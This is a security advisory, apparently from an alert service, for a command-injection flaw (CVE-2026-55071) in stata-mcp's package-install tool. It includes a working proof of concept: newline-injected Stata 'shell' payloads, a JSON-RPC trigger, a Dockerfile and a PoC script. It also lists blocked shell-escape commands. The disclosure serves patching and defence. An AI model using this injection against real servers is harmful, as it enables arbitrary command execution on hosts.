CVE-2026-55071: Code Injection

Published Aug 12, 2026
·
Updated

Stata Command Injection via Unsanitized package in adopackageinstall

Summary

The adopackageinstall MCP tool in stata-mcp concatenates user-controlled input directly into a Stata command string without any validation or sanitization. An attacker who can invoke the MCP tool or the equivalent Python API can embed newline characters in the package argument to inject arbitrary Stata commands. Because Stata supports a shell escape command, this leads to full OS-level arbitrary command execution (RCE) under the account running the Stata-MCP server. The tool is registered in the default all profile, so no non-default configuration is required. Base CVSS score is 8.4 (High).

Details

The vulnerability originates in SSCInstall.install():

python src/statamcp/stata/builtintools/adoinstall/sscinstall.py:14-16 def install(self, package: str) -> str: installcommand = f"ssc install {package}{self.REPLACEMESSAGE}" runnerresult = self.controller.run(installcommand)

The package parameter is interpolated into an f-string with no allowlist check, newline rejection, or quoting. The resulting command string is forwarded to the Stata interpreter verbatim:

python src/statamcp/stata/statacontroller/controller.py:98-99 Send the command self.child.sendline(command)

pexpect.sendline() writes the full multi-line string to the Stata REPL, which executes each line as a separate Stata command. Because Stata's shell (and !) commands execute an OS shell command, a newline-delimited payload results in OS command execution.

The full source-to-sink data flow is:

1. Exposure — src/statamcp/mcpservers.py:626-632: TOOLREGISTRY registers adopackageinstall in the all profile. 2. Default activation — src/statamcp/cli/handlers.py:295-300: when no --core/--all flag is given the profile defaults to all, so the tool is always enabled. 3. Propagation — src/statamcp/mcpservers.py:308-349: the MCP argument package is passed to installer(...).install(args) without validation. 4. Sink construction — src/statamcp/stata/builtintools/adoinstall/sscinstall.py:15: package is interpolated into installcommand. 5. Delivery — src/statamcp/stata/statacontroller/controller.py:99: self.child.sendline(command) sends the attacker-influenced string to Stata.

A guard/blacklist (src/statamcp/guard/blacklist.py:41-60) registers shell, !, winexec, unixcmd, and similar strings as dangerous commands, but the GuardValidator that enforces this list is invoked only on the statado path and is not called anywhere in the ado-install path, making the guard entirely ineffective against this attack.

PoC

Prerequisites

- Unix-like host with a configured Stata CLI, or use the provided Docker image which replaces the Stata binary with a minimal Python stub (fakestata.py) that honours the shell command.

Container-based reproduction (no Stata license required)

bash Build (run from the repository root) docker build -t stata-mcp-poc-001 \ -f vuln-001/Dockerfile \ reports/pypiAi828SepineTamstata-mcp/

Run docker run --rm stata-mcp-poc-001

Direct Python trigger (unmodified source)

python import os from statamcp.stata.builtintools.adoinstall.sscinstall import SSCInstall

MARKER = "/tmp/statamcpadopoc" PAYLOAD = f"outreg2\nshell touch {MARKER}\n//"

installer = SSCInstall("/usr/local/bin/stata", isreplace=True, timeout=10) installer.install(PAYLOAD)

assert os.path.exists(MARKER), "RCE not confirmed" print("RCE CONFIRMED — marker file created")

The payload "outreg2\nshell touch /tmp/statamcpadopoc\n//" is expanded by the f-string at sscinstall.py:15 into:

ssc install outreg2 shell touch /tmp/statamcpadopoc //, replace

Stata executes the second line as an OS shell command. The trailing // comment neutralises the , replace suffix so Stata does not raise a syntax error.

MCP JSON-RPC trigger

json { "tool": "adopackageinstall", "arguments": { "source": "ssc", "package": "outreg2\nshell touch /tmp/statamcpadopoc\n//", "isreplace": true } }

Expected output

[+] PASS - RCE CONFIRMED [+] Marker file exists: /tmp/statamcpadopoc [+] The injected Stata 'shell' command was executed by the REPL.

Phase 2 dynamic reproduction confirmed the marker file /tmp/statamcpadopoc was created inside the Docker container, and install() returned a string containing the injected command:

Installation State: False ssc install outreg2\r\nshell touch /tmp/statamcpadopoc\r\n//, replace

Impact

This is a Code/Command Injection (RCE) vulnerability. Any principal who can call the adopackageinstall MCP tool or the equivalent Python API — including an AI model or agent connected to the MCP server, a local script, or a remote HTTP client if the HTTP transport is exposed — can execute arbitrary OS commands with the privileges of the user running the Stata-MCP server.

Because the tool is registered in the default all profile and all is the default active profile, no misconfiguration by the victim is required. All users of stata-mcp on the affected version who run stata-mcp server are impacted.

Concrete consequences include: exfiltration of credentials and data accessible to the process, persistence via cron/startup entries, lateral movement within the local network, and complete compromise of the host user account.

Reproduction artifacts

Dockerfile

dockerfile Dockerfile for VULN-001 dynamic reproduction Build context must be the parent directory: docker build -t stata-mcp-poc-001 -f vuln-001/Dockerfile . Vulnerability: Stata Command Injection via unsanitized package in SSCInstall.install() (sscinstall.py:15). Strategy: replace the real Stata binary with a minimal Python script (fakestata.py) that honours the 'shell <cmd>' Stata command. The vulnerable stata-mcp code is installed unmodified from the repo.

FROM python:3.11-slim

Install pexpect -- the only runtime dependency required by the PoC (StataController imports pexpect; all other imports are stdlib-only). RUN pip install --no-cache-dir pexpect==4.9.0

------------------------------------------------------------------ Fake Stata binary ------------------------------------------------------------------ Placed at /usr/local/bin/stata so StataFinder (Linux) can auto-discover it and the PoC can reference it by absolute path. COPY vuln-001/fakestata.py /usr/local/bin/stata RUN chmod +x /usr/local/bin/stata

------------------------------------------------------------------ Vulnerable package (unmodified source) ------------------------------------------------------------------ COPY repo/src /workspace/src ENV PYTHONPATH=/workspace/src

------------------------------------------------------------------ PoC script ------------------------------------------------------------------ COPY vuln-001/poc.py /workspace/poc.py

WORKDIR /workspace CMD ["python3", "/workspace/poc.py"]

poc.py

python #!/usr/bin/env python3 """ PoC for VULN-001: Stata Command Injection via unsanitized package in adopackageinstall (SSC path).

Vulnerable code: sscinstall.py:15 installcommand = f"ssc install {package}{self.REPLACEMESSAGE}" controller.py:99 self.child.sendline(command)

Attack: embed a newline in package to inject an additional Stata command. package = "outreg2\\nshell touch /tmp/statamcpadopoc\\n//"

The constructed command string becomes: ssc install outreg2 shell touch /tmp/statamcpadopoc //, replace

pexpect delivers this multi-line string verbatim to the Stata REPL via sendline(), causing Stata to execute 'shell touch /tmp/statamcpadopoc', which runs the OS command 'touch /tmp/statamcpadopoc'.

Marker file creation confirms RCE. """ import os import sys

FAKESTATA = "/usr/local/bin/stata" MARKERFILE = "/tmp/statamcpadopoc" Payload: legit package name, then injected shell command, then comment to neutralise the ", replace" suffix appended by REPLACEMESSAGE. PAYLOAD = f"outreg2\nshell touch {MARKERFILE}\n//"

def main() -> int: print("=" 60) print("VULN-001 PoC: Stata Command Injection via adopackageinstall") print("=" 60) print(f"[] Fake Stata binary : {FAKESTATA}") print(f"[] Marker file : {MARKERFILE}") print(f"[] Payload (repr) : {PAYLOAD!r}") print()

# Clean up any previous run. if os.path.exists(MARKERFILE): os.remove(MARKERFILE) print(f"[] Removed pre-existing marker file.")

# Import the vulnerable class directly -- no MCP or config layer needed. # The vulnerability lives entirely in SSCInstall.install() and the # StataController that sends the command to the Stata REPL. from statamcp.stata.builtintools.adoinstall.sscinstall import SSCInstall

print("[] Instantiating SSCInstall with fake Stata binary...") installer = SSCInstall(FAKESTATA, isreplace=True, timeout=10)

print(f"[] Calling install({PAYLOAD!r}) ...") try: result = installer.install(PAYLOAD) print(f"[] install() returned: {result[:200]!r}") except Exception as exc: # A RuntimeError from StataController is acceptable; the shell command # may have already executed before the error is detected. print(f"[!] install() raised (may be expected): {type(exc).name}: {exc}")

print()

# --- Verdict --- if os.path.exists(MARKERFILE): print("[+] PASS - RCE CONFIRMED") print(f"[+] Marker file exists: {MARKERFILE}") print("[+] The injected Stata 'shell' command was executed by the REPL.") print("[+] Constructed command delivered via sendline():") print("[+] ssc install outreg2") print(f"[+] shell touch {MARKERFILE} <-- OS command executed here") print("[+] //") return 0 else: print("[-] FAIL - Marker file not found.") print("[-] The injected shell command did not produce the expected artefact.") return 1

if name == "main": sys.exit(main())

Affected Software

1 affected componentFixes available
pip/stata-mcp<1.19.0
1.19.0

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade pip/stata-mcp to a version that resolves this vulnerability.

    Fixed in 1.19.0

Event History

Aug 12, 2026
Advisory Published
via GitHub·07:23 PM
Data Sourced
via GitHub·07:23 PM
DescriptionSeverityWeaknessAffected Software
Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2026-55071?

The severity of CVE-2026-55071 is rated high with a score of 8.4.

2

How do I fix CVE-2026-55071?

To fix CVE-2026-55071, ensure you update to the latest version of the software, as the issue is addressed in version 1.19.0.

3

What attack vector is exploited in CVE-2026-55071?

CVE-2026-55071 exploits a command injection vulnerability via unsanitized user input in the `ado_package_install` tool.

4

What impact does CVE-2026-55071 have on security?

CVE-2026-55071 can lead to complete compromise of the system including unauthorized command execution due to its code injection nature.

5

Who is affected by CVE-2026-55071?

Users of the `stata-mcp` software utilizing the `ado_package_install` function are primarily affected by CVE-2026-55071.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203